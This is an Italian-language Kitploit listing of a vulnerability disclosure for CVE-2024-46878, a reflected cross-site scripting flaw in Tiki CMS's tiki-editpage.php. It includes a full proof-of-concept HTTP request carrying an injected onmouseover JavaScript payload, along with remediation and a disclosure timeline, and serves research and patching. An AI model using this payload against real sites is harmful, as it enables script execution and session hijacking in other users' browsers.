Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-46878-TikiCMS-XSS — CVE-2024-46878 - Tiki CMS Vulnerabilità di Cross-Site Scripting riflesso (XSS) | Kitploit
Strumenti/GitHubGitHub/coldfusionx/cve-2024-46878-tikicms-xss
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubcoldfusionx/cve-2024-46878-tikicms-xss

CVE-2024-46878-TikiCMS-XSS

CVE-2024-46878 - Tiki CMS Vulnerabilità di Cross-Site Scripting riflesso (XSS)

Vedi Repository
5 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-46878 - Vulnerabilità di Cross-Site Scripting (XSS) Riflessa in Tiki CMS

Tiki CMS - Vulnerabilità di Cross-Site Scripting (XSS) Riflessa nel parametro 'page'

Disclaimer

Destinato esclusivamente a scopi educativi, di ricerca e difensivi. L'uso non autorizzato contro sistemi senza permesso è illegale.

Sommario

Esiste una vulnerabilità di Cross-Site Scripting (XSS) riflessa nel parametro page di tiki-editpage.php in Tiki versione 26.3 e precedenti. Questa vulnerabilità consente agli aggressori di eseguire codice JavaScript arbitrario tramite un payload creato ad hoc, portando al potenziale accesso a informazioni sensibili o ad azioni non autorizzate.

Prodotto(i) Affetto(i)

  • Prodotto: Tiki CMS Groupware
  • Versioni: 26.3 e precedenti
  • Componente: tiki-editpage.php

Dettagli della Vulnerabilità

La vulnerabilità è causata da una sanificazione non corretta dell'input del parametro page in tiki-editpage.php. L'input fornito dall'utente viene riflesso nella risposta HTTP senza una codifica sufficiente, consentendo l'esecuzione di JavaScript iniettato.

Impatto

Consente a un aggressore autenticato di eseguire JavaScript arbitrario nel browser di un altro utente tramite una richiesta creata ad hoc, portando potenzialmente al dirottamento della sessione o ad azioni non autorizzate.

Proof of Concept (PoC)

Richiesta

root@kitploit:~
GET /tiki-editpage.php?page=%22%20onmouseover%3Dalert(document.domain)%20 HTTP/1.1
Host: 127.0.0.1:9089
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: local_tz=Asia%2FKolkata; PHPSESSIDCV=51zQV%2BMxUnJxFY9nnRP%2FFg%3D%3D; javascript_enabled=y; PHPSESSID_CSRF=t2A6i9BjH1QHEH8KaLag0jtgT4dK9TTzyn8sOcRVwg9SMycfxWjoeYFmTykOfVjNPotrBKqsizXJ%2BrYcEXci8QPZxiSyBwA5YFLRS1S2RgxeTAI%3D; PHPSESSID=e19c8b25df427a7892245dc919be2067
Upgrade-Insecure-Requests: 1
Priority: u=0, i

poc

Rimedio

Il problema è stato risolto in Tiki CMS Groupware versione 27.1. Si consiglia agli utenti di aggiornare a questa o a una versione successiva con patch.

Riferimento del venditore: Nuovi aggiornamenti di sicurezza rilasciati per Tiki 27.x LTS, 26.x e 24.x LTS e l'aggiornamento è fortemente raccomandato

Cronologia

  • Segnalato al venditore: 5 settembre 2024
  • Riconoscimento del venditore: 16 settembre 2024
  • Risolto nella versione 27.1: 22 dicembre 2024
  • Divulgazione pubblica (tramite questo repository): 23 marzo 2026

Crediti

  • Sheela Sarva, Qualys
  • Mayank Deshmukh, Qualys

Riferimenti

  • https://www.cve.org/CVERecord?id=CVE-2024-46878
  • https://tiki.org/article514-New-Security-Updates-Released-for-Tiki-27-x-LTS-26-x-and-24-x-LTS-and-Upgrade-is-Strongly-Recommended
Scarica lo strumento